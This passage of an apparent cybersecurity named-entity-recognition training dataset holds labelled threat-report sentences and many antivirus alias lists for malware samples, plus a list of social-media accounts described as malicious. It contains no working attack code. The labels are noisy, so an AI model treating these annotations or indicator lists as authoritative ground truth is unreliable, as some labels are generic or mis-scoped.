Trojan.Win32.Drop.elkhrw BehavesLike.Win32.Sivis.kh Trojan-Dropper.Win32.Rubat W32/Win.G Trojan.SchoolGirl.er TR/Drop.Rubat.qlzld TrojanDropper:Win32/Rubat.A!bit Trojan.SchoolGirl", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000209", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.CominateU.Adware Trojan-GameThief.Win32.OnLineGames!O TrojanGameThief.OnLineGames Trojan.OnLineGames.Win32.78851 Trojan/OnLineGames.boaj Trojan.Zusy.Elzob.D484 W32/Risk.ADYI-1535 TSPY_ONLIN.SMUM Win.Spyware.82985-2 Trojan-GameThief.Win32.OnLineGames.boaj Trojan.Win32.OnLineGames.cptyo BackDoor.Sturf.170 TSPY_ONLIN.SMUM W32/MalwareF.AEIUQ Trojan/PSW.OnLineGames.cedq TR/Spy.671314 Trojan[GameThief]/Win32.OnLineGames 
Trojan-GameThief.Win32.OnLineGames.boaj Trojan/Win32.OnlineGameHack.R11892 TrojanPSW.OnLineGames.bo Win32/PSW.OnLineGames.QDP Trojan.PWS.OnLineGames!mLCnhslfoqM Trojan-GameThief.Win32.OnLineGames W32/Onlinegames.BOJI!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000212", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Timer.55808.B Trojan-Ransom.Win32.Timer!O Trojan/Kryptik.sot Trojan.Boigy.4 TROJ_RANSOM.SMMJ Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Ransom.GED TROJ_RANSOM.SMMJ Trojan-Ransom.Win32.Timer.icg Trojan.Win32.Timer.dqvge Trojan.Win32.A.Timer.55808 Trojan.Winlock.4005 Trojan/Timer.cnd TR/Ramson.TR TrojanDropper:Win32/Dinome.A Trojan-Ransom.Win32.Timer.icg Trojan/Win32.Ransomlock.R11433 BScope.Trojan.Winlock.01505 Trj/Hexas.HEU Trojan-Downloader.Win32.Karagany", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000213", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom/W32.Foreign.409600.C Trojan.Foreign Ransom_Foreign.R002C0DB418 Trojan-Ransom.Win32.Foreign.nxzy Trojan.Win32.Spambot.exqsne Trojan.Win32.Z.Trubsil.409600 Troj.Ransom.W32.Foreign!c Trojan.Spambot.15075 Ransom_Foreign.R002C0DB418 BehavesLike.Win32.Ransom.gc TR/Crypt.ZPACK.lpngp Backdoor:Win32/Trubsil.C Trojan-Ransom.Win32.Foreign.nxzy Trojan/Win32.Foreign.C2394896 TrojanRansom.Foreign Trj/GdSda.A W32/Kryptik.FRKA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000218", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DakusarDRAX.Trojan Trojan.Floxif Win32.Trojan.WisdomEyes.16070401.9500.9948 Win32/Flofix.D TROJ_FLOXIF_EK040354.UVPM Trojan.Win32.Floxif.cqjmcu Win32.FloodFix Trojan.Floxif.Win32.2 TROJ_FLOXIF_EK040354.UVPM TR/Spy.69337 Trojan:Win32/Floxif.E Virus/Win32.Fixflo.R204310 Trojan.Sly Win32/Floxif.E W32/Floxif.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000221", "source": "cyner2_train"}} {"text": "] 
com Malicious Twitter accounts : https : //twitter.com/lucky88755 https : //twitter.com/lucky98745 https : //twitter.com/lucky876543 https : //twitter.com/luckyone1232 https : //twitter.com/sadwqewqeqw https : //twitter.com/gyugyu87418490 https : //twitter.com/fdgoer343 https : //twitter.com/sdfghuio342 https : //twitter.com/asdqweqweqeqw https : //twitter.com/ukenivor3 Malicious Instagram account : https : //www.instagram.com/freedomguidepeople1830/ Malicious Tumblr accounts : https : //mainsheetgyam.tumblr.com/ https : //hormonaljgrj.tumblr.com/ https : //globalanab.tumblr.com/ C & C addresses : 104 [ .", "spans": {"ORGANIZATION: Twitter": [[16, 23]], "ORGANIZATION: Instagram": [[385, 394]], "ORGANIZATION: Tumblr": [[467, 473]]}, "info": {"id": "cyner2_train_000222", "source": "cyner2_train"}} {"text": "Unit 42 discovered new activity that appears related to an adversary group previously called C0d0so0 or Codoso", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: adversary group": [[59, 74]], "THREAT_ACTOR: C0d0so0": [[93, 100]], "THREAT_ACTOR: Codoso": [[104, 110]]}, "info": {"id": "cyner2_train_000223", "source": "cyner2_train"}} {"text": "We have observed download attempts from the following domains:", "spans": {}, "info": {"id": "cyner2_train_000225", "source": "cyner2_train"}} {"text": "In 2022, they updated SysUpdate, one of their custom malware families, to include new features and add malware infection support for the Linux platform.", "spans": {"MALWARE: SysUpdate,": [[22, 32]], "MALWARE: custom malware families,": [[46, 70]], "MALWARE: malware": [[103, 110]], "SYSTEM: Linux platform.": [[137, 152]]}, "info": {"id": "cyner2_train_000226", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.3797 JS.Nemucod.LK VBS/DropExe.A!Camelot Trojan.Script.MLW.eafugn VBS.Dropper.102 TrojanDropper.VBS.aq TrojanDropper:VBS/Twexag.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000227", "source": 
"cyner2_train"}} {"text": "East Asian government agencies came under siege when attackers targeted several servers within their networks.", "spans": {"ORGANIZATION: East Asian government agencies": [[0, 30]], "SYSTEM: networks.": [[101, 110]]}, "info": {"id": "cyner2_train_000228", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/AutoRun.autv W32/Sohanad.G WORM_SOHANAD.DX Virus.Worm.AutoRun!IK Win32.HLLW.Autoruner.8327 WORM_SOHANAD.DX W32/Sohanad.G Worm/AutoRun.mky Malware.Imaut Virus.Worm.AutoRun SHeur.CIAA Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000230", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.RansomKD.6014218 Ransom.Chicrypt Ransom.Chimera Trojan/Kryptik.edes Trojan.RansomKD.D5BC50A Ransom_Chicrypt.R002C0DIL17 W32/Ransom.IF Trojan-Ransom.Win32.Chimera.q Trojan.RansomKD.6014218 Trojan.Win32.Encoder.esuyoq Troj.Ransom.W32!c Win32.Trojan.Chimera.Edei Trojan.RansomKD.6014218 Trojan.RansomKD.6014218 Trojan.Encoder.2774 W32/Ransom.KXVS-1328 W32.Ransom.Chimera Trojan[Ransom]/Win32.Chimera Ransom:Win32/Chicrypt.A Trojan.Win32.Z.Ransom.647242 Trojan-Ransom.Win32.Chimera.q Win32.Trojan-Ransom.Chimera.D Trojan/Win32.Chimera.C1182585 Trojan.RansomKD.6014218 Hoax.Chimera Trojan.Kryptik!1o3s7Z7mkiE W32/Chimera.EDES!tr Win32/Trojan.37c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000231", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.ClickerAybn.Trojan Trojan-Spy.Win32.VB!O Trojan.Puzlice.A3 Win32.Trojan-Clicker.VB.c Win32/TrojanClicker.VB.NUE Win.Trojan.7640471-1 Worm.Win32.Autorun.gxay Trojan.Win32.VB2.cnioik Trojan.Win32.A.VB.55040 W32.Virut.lQTU TrojWare.Win32.Spy.VB.FRG Trojan.VbCrypt.68 Trojan.VB.Win32.83289 BehavesLike.Win32.Malware.nc Virus.Win32.Virut TrojanSpy.VB.cxx Trojan[Spy]/Win32.VB Worm.Win32.Autorun.gxay Trojan:Win32/Puzlice.A Win32/VB.BXL TScope.Trojan.VB Trojan.Vilsel TrojanSpy.VB!jmRymi1V2Tw W32/VBClicker.NUE!tr", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000232", "source": "cyner2_train"}} {"text": "A pro-democracy reform took place in 2011 which has helped the government create an atmopshere conducive to investor interest.", "spans": {}, "info": {"id": "cyner2_train_000234", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Turla.B5 BKDR64_TURLA.NUS Trojan.Turla BKDR64_TURLA.NUS Win64.Rootkit.Uroburos.A Backdoor.Win64.Turla.c Trojan.Win64.Turla.dflvhj BackDoor.Turla.17 Trojan.Turla.Win64.1 BDS/Turla.fech Backdoor.Win64.Turla.c Backdoor:Win64/Turla.B!dha Trojan/Win64.Turla.C560438 Backdoor.Turla Trj/CI.A Win64/Turla.A Win32.Trojan.Url.Fdjm Trojan.Turla!2u6AW7YKCfw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000235", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Japik.6 TROJ_IKYTOK.SMI Win32.Trojan.WisdomEyes.16070401.9500.9979 Trojan.Ransomlock TROJ_IKYTOK.SMI Trojan.Packed.2232 Trojan.Kryptik.Win32.166130 BehavesLike.Win32.VTFlooder.fc Trojan-Downloader.Win32.Karagany TrojanDropper.Mudrop.cmh TrojanDropper:Win32/Sinmis.B Trojan/Win32.Menti.R9584 BScope.Malware-Cryptor.Tip", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000238", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.S23079 Win32.Trojan.Kryptik.bil Win.Malware.Zusy-5689799-0 Trojan.Inject2.38898 Trojan.Kryptik.Win32.992532 BehavesLike.Win32.PWSZbot.cm Trojan.Win32.Extenbro Backdoor.Androm.mnb TR/Crypt.ZPACK.pwvcr Trojan.Symmi.D10FCD Trojan/Win32.Androm.R192120", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000239", "source": "cyner2_train"}} {"text": "A backdoor also known as: PDF/Phish.ECM Win32.Exploit.Pidief.Aexw PDF/Phish.ECM EXP/Pidief.EB.494 Exp.Pidief.Eb!c Trojan.PDF.Phishing Win32/Trojan.Exploit.ec6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000240", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: HackTool.TSGrinder Trojan/Hacktool.TSGrinder.a W32/Tool.JPZP-4469 Crackin.0AC64262 HackTool.Win32.TSGrinder.a Trojan.Win32.TSGrinder.scgl HackTool.TSGrinder.192570 Hacktool.W32.Tsgrinder!c ApplicUnsaf.Win32.HackTool.TSGrinder.a Tool.TSGrinder W32/VirTool.AYV W32.Hack.Tool HackTool/Win32.TSGrinder HackTool.Win32.TSGrinder.a HackTool:Win32/Tsgrinder.A Win32.Hacktool.Tsgrinder.Stkm HackTool.TSGrinder!LpD0k7ExEpE HackTool.Win32.TSGrinder.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000244", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Lorozoad.A3 Trojan.Razy.D2614 Win32.Trojan.WisdomEyes.16070401.9500.9997 Win.Trojan.Lorozoad-1 Trojan.MSIL.Disfa.mcnf Trojan.Win32.Tiny.etgbky Trojan.Win32.Z.Razy.4608.CD Troj.Msil.Disfa!c TrojWare.MSIL.TrojanDownloader.Tiny.MXA BehavesLike.Win32.Trojan.xz TR/Dropper.MSIL.nsnpx Trojan.MSIL.Disfa.mcnf Trj/GdSda.A Msil.Trojan.Disfa.Pctb Trojan.Disfa!3Wzl0Mq4C1c Trojan-Downloader.MSIL.Tiny MSIL/Tiny.MX!tr.dldr Win32/Trojan.85b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000246", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DownloadPdzLnrA.Trojan Worm.Win32.WBNA!O W32/WBNA.asj Win32.Trojan.WisdomEyes.16070401.9500.9988 Win.Trojan.Wbna-299 Worm.WBNA.Win32.2209 BehavesLike.Win32.VBObfus.qt W32/VB.PID!tr.dldr Worm/Win32.WBNA Worm.WBNA Win32/TrojanDownloader.VB.PID Trojan-Downloader.Win32.VB Win32/Trojan.c6e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000247", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Trojan.LNJS-3256 Trojan.Win32.Mazel.dsuwke BehavesLike.Win32.Sytro.lc TR/AD.Lentrigy.ejnsf RiskWare[Downloader]/NSIS.Mazel Trojan.Jaiko.851 TrojanDownloader:Win32/Rolkator.A Trj/CI.A Trojan.Win32.IRCBot Win32/Trojan.698", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000248", "source": "cyner2_train"}} {"text": "We have not 
identified any other public names for this malware, so rather than introduce a new name to the industry we'll refer to this family as Sarvdap.", "spans": {"MALWARE: malware,": [[55, 63]], "ORGANIZATION: industry": [[107, 115]], "MALWARE: family": [[136, 142]], "MALWARE: Sarvdap.": [[146, 154]]}, "info": {"id": "cyner2_train_000249", "source": "cyner2_train"}} {"text": "This information may be useful to any incident responder or blue team looking to defend an organisation.", "spans": {"ORGANIZATION: incident responder": [[38, 56]], "ORGANIZATION: blue team": [[60, 69]]}, "info": {"id": "cyner2_train_000251", "source": "cyner2_train"}} {"text": "In addition , at this stage the app can process one of these commands : • Collect device info • Install app • Is online ? • Change server domain Out of these , the most interesting command is the “ install app ” command that downloads an encrypted zip file containing the second phase dex file , unpacks and loads it .", "spans": {}, "info": {"id": "cyner2_train_000252", "source": "cyner2_train"}} {"text": "Infostealer.Banprox.B is a Trojan horse that may steal information from the compromised computer.", "spans": {"MALWARE: Trojan horse": [[27, 39]], "SYSTEM: compromised computer.": [[76, 97]]}, "info": {"id": "cyner2_train_000254", "source": "cyner2_train"}} {"text": "The incident used a Microsoft Excel file containing malicious macros which wrote a malicious executable and associated files to the victim machine.", "spans": {"MALWARE: malicious macros": [[52, 68]], "MALWARE: malicious executable": [[83, 103]], "SYSTEM: the victim machine.": [[128, 147]]}, "info": {"id": "cyner2_train_000255", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ransom.Locky.20 Win32.Trojan.WisdomEyes.16070401.9500.9879 Ransom_Falock.R002C0DAI18 Trojan.Win32.Z.Ransom.1819072 Ransom_Falock.R002C0DAI18 BehavesLike.Win32.Trojan.th W32/Trojan.CXBD-0386 Ransom:MSIL/Falock.A Trj/GdSda.A Trojan.MSIL.Crypt Win32/Trojan.Ransom.d73", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000256", "source": "cyner2_train"}} {"text": "In addition, unlike many cyber attacks, an actual physical person was present money mule to pick up the money from affected ATM machines.", "spans": {"MALWARE: money mule": [[78, 88]], "SYSTEM: ATM machines.": [[124, 137]]}, "info": {"id": "cyner2_train_000257", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Spammer.Mail.Norin.A Trojan/W32.Spammer.606720 Email-Flooder.W32.Norin.30!c TROJ_NORIN.30 Hacktool.Spammer TROJ_NORIN.30 Trojan.Spammer.Mail.Norin.A Email-Flooder.Win32.Norin.30 Trojan.Spammer.Mail.Norin.A Trojan.Win32.Norin.dkrt Spyware.Email-Flooder.Norin.606720 Trojan.Spammer.Mail.Norin.A Win32.Spammer.Mail.Norin.30 Trojan.Spammer.Mail.Norin.A Trojan.PWS.Wmhack Tool.Norin.Win32.1 Virus.Win32.Spammer W32/Risk.SGYO-3478 Spammer.Mail.Norin.30 TR/Flood.Norin.30 HackTool[Flooder]/Win32.Norin Win32.Hack.Norin.kcloud Trojan.Spammer.Mail.Norin.A Email-Flooder.Win32.Norin.30 Trojan.Spammer.Mail.Norin.A EmailFlooder.Norin Win32/Spammer.Mail.Norin.30 Win32.Virus.Spammer.Syhs Flooder.Norin!cC98wqxpE9A W32/Spam_Norin.30!tr Win32/Trojan.Flooder.81a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000260", "source": "cyner2_train"}} {"text": "This attack might also originate from China.", "spans": {}, "info": {"id": "cyner2_train_000261", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.186B Worm.Dorkbot.A Backdoor.W32.Padodor.kZnr Trojan/Spy.qukart Win32.Trojan-Spy.Quart.a Backdoor.Berbew!g1 Win32/Webber.W Win32.Qukart BKDR_BERBEW.SMA Win.Trojan.Crypted-36 Trojan-Proxy.Win32.Qukart.vjh Trojan.Win32.Qukart.etuxeg Worm.Win32.Qukart.K BackDoor.HangUp.43784 BKDR_BERBEW.SMA BehavesLike.Win32.Backdoor.cc Trojan.Win32.Senta TrojanProxy.Qukart.tsk Trojan-Proxy.Win32.Qukart.vjh Win-Trojan/Berbew.51712 TrojanProxy.Qukart Trojan-Ransom.Win32.Pornoasset.a", "spans": {"MALWARE: backdoor": [[2, 
10]]}, "info": {"id": "cyner2_train_000262", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Heur.Corrupt.PE Tool.BtcMine.30 Backdoor.Win32.Cycbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000264", "source": "cyner2_train"}} {"text": "Using this SSH brute-forcing network, it took the attackers only a few days to gain root access and full control of the targeted server.", "spans": {"THREAT_ACTOR: attackers": [[50, 59]], "SYSTEM: targeted server.": [[120, 136]]}, "info": {"id": "cyner2_train_000267", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Cosmu.ajmd Trojan.Win32.Cosmu.cptjv Trojan.Win32.Cosmu.ajmd Win32.HLLW.Zebra.2 TR/PSW.Facepass.oina Trojan/Cosmu.fqh PWS:Win32/Facepass.B Trojan.Win32.A.Cosmu.436714 Trojan.Cosmu W32/Cosmu.AJMD!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000268", "source": "cyner2_train"}} {"text": "When we first discovered the OilRig attack campaign in May 2016, we believed at the time it was a unique attack campaign likely operated by a known, existing threat group.", "spans": {"THREAT_ACTOR: the OilRig attack campaign": [[25, 51]], "THREAT_ACTOR: unique attack campaign": [[98, 120]], "THREAT_ACTOR: threat group.": [[158, 171]]}, "info": {"id": "cyner2_train_000269", "source": "cyner2_train"}} {"text": "Sundown is something of an outlier from typical exploit kits.", "spans": {"MALWARE: Sundown": [[0, 7]], "MALWARE: exploit kits.": [[48, 61]]}, "info": {"id": "cyner2_train_000272", "source": "cyner2_train"}} {"text": "The failure of Silicon Valley Bank SVB is a good opportunity for scammers to make a buck out of the crisis, warns the SANS™ Internet Storm Center ISS in Washington DC.", "spans": {"ORGANIZATION: Silicon Valley Bank SVB": [[15, 38]], "ORGANIZATION: the SANS™ Internet Storm Center ISS": [[114, 149]]}, "info": {"id": "cyner2_train_000273", "source": "cyner2_train"}} {"text": "For example, one 
version of the Shade cryptor checks victim computers for signs of accounting activity; if it finds any, it doesn't encrypt the files, but instead installs remote control tools in the infected system.", "spans": {"MALWARE: one version": [[13, 24]], "MALWARE: Shade cryptor": [[32, 45]], "SYSTEM: victim computers": [[53, 69]], "MALWARE: remote control tools": [[172, 192]], "SYSTEM: infected system.": [[200, 216]]}, "info": {"id": "cyner2_train_000275", "source": "cyner2_train"}} {"text": "This post intends to share the results of our research.", "spans": {}, "info": {"id": "cyner2_train_000276", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy/W32.KeyLogger.464896.C TrojanSpy.KeyLogger!s9RPvqhksKk Infostealer.Gampass Win32.BDSBackdoor Trojan-Spy.Win32.KeyLogger.gds BackDoor.Cyber Virus.Win32.Delf.DTW!IK TrojanSpy.KeyLogger.cquv Win-Trojan/Keylogger.464896.G Trojan.Win32.Scar.cmim Trojan-PSW.Gampass Virus.Win32.Delf.DTW W32/KeyLogger.GDS!tr PSW.Keylog.AE Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000277", "source": "cyner2_train"}} {"text": "The appearance of such forms is generated on cybercriminals' command.", "spans": {"THREAT_ACTOR: cybercriminals'": [[45, 60]]}, "info": {"id": "cyner2_train_000279", "source": "cyner2_train"}} {"text": "CVE-2017-11882 Exploit 8b212ee2d65c4da033c39aebaf59cc51ade45f32f4d91d1daa0bd367889f934d is a Microsoft Word RTF document that exploits `CVE-2017-11882` stack buffer overflow vulnerability in the Microsoft Equation Editor`EQNEDT32.EXE`.", "spans": {"VULNERABILITY: Exploit": [[15, 22]], "VULNERABILITY: exploits": [[126, 134]], "VULNERABILITY: stack buffer overflow vulnerability": [[152, 187]], "SYSTEM: the Microsoft Equation Editor`EQNEDT32.EXE`.": [[191, 235]]}, "info": {"id": "cyner2_train_000281", "source": "cyner2_train"}} {"text": "This IOC contains indicators for the BLACKCOFFEE malware family that is attributed to APT17.", "spans": {"MALWARE: BLACKCOFFEE malware": 
[[37, 56]], "THREAT_ACTOR: APT17.": [[86, 92]]}, "info": {"id": "cyner2_train_000282", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Neloweg TR/Drop.Elms.A PWS:Win32/Reder.B Trojan.Neloweg Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000285", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Inject.cvmjon Trojan.Taidoor TROJ_DROPPE.FS Trojan-Dropper.Win32.Injector.jmli Virus.Win32.Part.a TROJ_DROPPE.FS BehavesLike.Win32.Downloader.qm TrojanDropper.Injector.bmtq Trojan[Dropper]/Win32.Injector Win32.Troj.Injector.JM.kcloud Dropper/Win32.Injector TrojanDropper.Injector W32/Injector.JMLI!tr Trojan.Win32.Injector.aJX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000286", "source": "cyner2_train"}} {"text": "So we don't have a sensational hop from Linux Mirai to Windows Mirai just yet, that's just a silly statement.", "spans": {"SYSTEM: Linux": [[40, 45]], "MALWARE: Mirai": [[46, 51], [63, 68]], "SYSTEM: Windows": [[55, 62]]}, "info": {"id": "cyner2_train_000287", "source": "cyner2_train"}} {"text": "A Trojan for Linux written in Go programming language.", "spans": {"MALWARE: Trojan for": [[2, 12]], "SYSTEM: Linux": [[13, 18]], "SYSTEM: Go programming language.": [[30, 54]]}, "info": {"id": "cyner2_train_000288", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Dropper.ALCD Win32/Rimecud.CU TROJ_DROPPR.SMF Win32.Worm.Peerfrag.Aojj Win32.HLLW.Lime.18 Worm.Palevo.Win32.18245 TROJ_DROPPR.SMF BehavesLike.Win32.Madangel.cc W32/Risk.KNKR-8810 Trojan.Zusy.D421A9 Win32/Peerfrag.DI P2P-Worm.Win32.Palevo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000289", "source": "cyner2_train"}} {"text": "This variant, which we call MULTIGRAIN consists largely of a subset of slightly modified code from NewPosThings.", "spans": {"MALWARE: variant,": [[5, 13]], "MALWARE: MULTIGRAIN": [[28, 
38]], "MALWARE: NewPosThings.": [[99, 112]]}, "info": {"id": "cyner2_train_000292", "source": "cyner2_train"}} {"text": "Whether this is a permanent return to locky or a one off, I don't know at this stage, but Locky have vanished for while before returned.", "spans": {}, "info": {"id": "cyner2_train_000293", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.SamDump.emgukv Uds.Dangerousobject.Multi!c Tool.SamDump.Win32.1 W32/Trojan.PXMQ-2326 TR/Rogue.9140774 PUP/Win32.SamDump.C241237 Riskware.HackTool!GhRtS0e2yEc Win32/Trojan.f29", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000295", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Dwn.ewbodt Trojan.Win32.Z.Starter.4103380 Trojan.DownLoader26.1573 BehavesLike.Win32.Dropper.wc Trojan.Win32.Chifrax W32/Trojan.BMGR-3693 Exploit:Win32/CplLnk.B Win32/Trojan.9b2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000296", "source": "cyner2_train"}} {"text": "Because of the recent outbreak of the Locky ransomware, Dridex has become synonymous with the distribution of ransomware more generally.", "spans": {"MALWARE: Locky ransomware,": [[38, 55]], "THREAT_ACTOR: Dridex": [[56, 62]], "MALWARE: ransomware": [[110, 120]]}, "info": {"id": "cyner2_train_000297", "source": "cyner2_train"}} {"text": "PhotoMiner features a unique infection mechanism, reaching endpoints by infecting websites hosted on FTP servers while making money by mining Monero.", "spans": {"MALWARE: PhotoMiner": [[0, 10]], "SYSTEM: FTP servers": [[101, 112]]}, "info": {"id": "cyner2_train_000299", "source": "cyner2_train"}} {"text": "It includes recent incidents as well as older ones that have not been publicly reported; new malware; exploitation, delivery and command and control infrastructure; and the group s modus operandi.", "spans": {"MALWARE: malware;": [[93, 101]], "SYSTEM: command and control infrastructure;": [[129, 164]], "THREAT_ACTOR: the group": 
[[169, 178]]}, "info": {"id": "cyner2_train_000300", "source": "cyner2_train"}} {"text": "That domain, electronicfrontierfoundation.org, is designed to trick users into a false sense of trust and it appears to have been used in a spear phishing attack, though it is unclear who the intended targets were.", "spans": {}, "info": {"id": "cyner2_train_000301", "source": "cyner2_train"}} {"text": "Last week, Unit 42 came across new Disttrack samples that appear to have been used in an updated attack campaign.", "spans": {"ORGANIZATION: Unit 42": [[11, 18]], "MALWARE: Disttrack samples": [[35, 52]], "THREAT_ACTOR: attack campaign.": [[97, 113]]}, "info": {"id": "cyner2_train_000302", "source": "cyner2_train"}} {"text": "For instance, its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox.", "spans": {"MALWARE: JHUHUGIT implant": [[18, 34]], "VULNERABILITY: Flash zero-day": [[59, 73]], "MALWARE: Windows EoP exploit": [[85, 104]]}, "info": {"id": "cyner2_train_000304", "source": "cyner2_train"}} {"text": "The group is well resourced, capable of infiltrating multiple targets simultaneously and will often operate outside the working hours of targeted organizations in order to maintain a low profile.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "ORGANIZATION: organizations": [[146, 159]]}, "info": {"id": "cyner2_train_000306", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_BREDLAB.SMD Trojan-Spy.Win32.Spenir.as Application.Win32.BlkIC.IMG TROJ_BREDLAB.SMD Backdoor/SdBot.prb HeurEngine.ZeroDayThreat Trojan.Win32.ProcessHijack", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000308", "source": "cyner2_train"}} {"text": "It continues to spread across small and medium-sized businesses across the globe, using the modular Gorynych/Diamond Fox botnet to exfiltrate stolen data.", "spans": {"ORGANIZATION: small": [[30, 35]], "ORGANIZATION: medium-sized businesses": [[40, 
63]], "MALWARE: Gorynych/Diamond Fox botnet": [[100, 127]]}, "info": {"id": "cyner2_train_000310", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hoax.Win32.ArchSMS!O Trojan.Mobsularch Trojan.ArchSMS.Win32.7426 Trojan/ArchSMS.nkit Win32.Trojan.WisdomEyes.16070401.9500.9644 TROJ_MALICIOUS_BK083028.TOMC Win.Trojan.Archsms-4649 Riskware.Win32.ArchSMS.cqmlwf TrojWare.Win32.Zusy.AJ Trojan.Fraudster.336 Trojan-Banker.Win32.Banbra Hoax.ArchSMS.jho HackTool[Hoax]/Win32.ArchSMS Win32.Troj.Hoax.kcloud Trojan:Win32/Mobsularch.A Trojan.Strictor.548 Win32.Trojan.ArchSMS.D Hoax.ArchSMS.nk Trojan.ArchSMS!pTXIElAMXBk W32/ArchSMS.VU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000312", "source": "cyner2_train"}} {"text": "Palo Alto Networks has collected over 20 samples of this particular malware family, and we have identified over $70,000 USD in Bitcoin payments to the attacker Cisco Talos yesterday reported this figure to be closer to $115,000 USD.", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "MALWARE: samples": [[41, 48]], "MALWARE: malware family,": [[68, 83]], "THREAT_ACTOR: attacker": [[151, 159]], "ORGANIZATION: Cisco Talos": [[160, 171]]}, "info": {"id": "cyner2_train_000314", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Pitit.A3 HV_ABTITU_CG093139.RDXN TR/Barys.2445.24 Win32.Troj.Undef.kcloud Trojan.Kazy Trojan.Win32.Loader.L", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000316", "source": "cyner2_train"}} {"text": "A collection of domains registered by Pawn Storm/Sofacy/APT28/Fancy Bear to target organisations", "spans": {"THREAT_ACTOR: Pawn Storm/Sofacy/APT28/Fancy Bear": [[38, 72]], "ORGANIZATION: organisations": [[83, 96]]}, "info": {"id": "cyner2_train_000317", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.CoinMiner.A4 PUP.Optional.ChinAd W32.XiaobaMiner Win32/Oflwr.A!crypt Win.Trojan.Qhost-160 Trojan.Win32.BtcMine.exddfs 
